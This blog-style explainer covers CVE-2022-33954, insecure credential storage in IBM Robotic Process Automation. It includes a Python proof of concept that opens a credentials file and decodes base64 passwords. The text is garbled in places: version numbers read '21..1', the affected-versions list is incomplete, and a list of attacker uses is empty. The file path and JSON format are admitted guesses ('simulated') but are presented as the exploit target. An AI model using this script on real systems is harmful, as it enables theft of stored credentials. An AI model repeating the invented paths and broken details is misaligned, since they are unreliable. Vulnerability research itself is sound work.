CVE-2022-33954 - How Weak Credential Storage in IBM Robotic Process Automation Could Let Attackers Steal Secrets

IBM Robotic Process Automation (RPA) is used by organizations worldwide to automate repetitive tasks. But in versions 21..1, 21..2, and 21..3, there’s a security flaw—CVE-2022-33954—that could let an attacker with physical access to the system get sensitive credentials. In this post, we’ll break down what this means in plain English, look at how the vulnerability works, and show how you could exploit it (for research only!). Plus, you’ll get links to original sources.

What Is CVE-2022-33954?

CVE-2022-33954 is a credential management flaw found in IBM RPA (Robotic Process Automation) versions:

21..3

IBM’s software saves sensitive credentials (like usernames and passwords) in a way that’s not properly protected. This means someone who can physically access the machine could recover those credentials, potentially opening your organization to bigger attacks.

- Official IBM Advisory: Security Bulletin: Vulnerability in IBM Robotic Process Automation (CVE-2022-33954)
- NVD Record: NVD - CVE-2022-33954

What’s the Actual Risk?

If a person can get to the server or PC running IBM RPA—even for a few minutes—they might be able to get the admin’s or service account’s credentials.

Let’s say an insider, cleaning staff, or attacker steals the machine or boots it with their own USB—they could search for these insecurely stored creds and use them to:

How Does the Vulnerability Work?

IBM RPA stores credentials in a location on disk without strong encryption or access controls. They might be stored as plain-text or using weak, reversible encoding, which means anyone who can browse the file system could open, read, and use them.

The credentials could be at a path like

C:\ProgramData\IBM\RPA\config\credentials.json

Or within an RPA secrets/config folder.

A typical (simulated) content might look like

{
  "users": [
    {
      "username": "admin",
      "password": "YWRtaW5wYXNz"  // base64 encoded (NOT secure encryption)
    }
  ]
}

Base64 is not encryption—it just makes the password look jumbled but anyone with basic skills can decode it.

Proof of Concept: Decoding the Credentials

If you know the file and have access, you can just read and decode it.

Example Python Code to Decode Base64 Credentials

import base64
import json

with open(r'C:\ProgramData\IBM\RPA\config\credentials.json') as f:
    data = json.load(f)
    for user in data['users']:
        username = user['username']
        b64_password = user['password']
        # decode password
        password = base64.b64decode(b64_password).decode('utf-8')
        print(f'User: {username} | Password: {password}')

What does this do?

If the password is “YWRtaW5wYXNz”, the script will print

User: admin | Password: adminpass

How Can You Protect Yourself?

IBM has patched this issue in later versions. The best fix is update IBM RPA to the latest release.

- Update instructions: IBM RPA Documentation

References

- IBM Security Bulletin: CVE-2022-33954
- NVD: CVE-2022-33954
- IBM RPA Docs

Summary

CVE-2022-33954 shows how bad things can get if sensitive information isn’t stored securely. It’s not a remote “hacker in Russia” type flaw—but for insiders, or anyone who can get near your machines, it’s a real risk. If you use IBM RPA, check your version and update as soon as you can!

*Stay safe, and always watch out for plain-text passwords!*

Timeline

Published on: 12/19/2024 01:15:06 UTC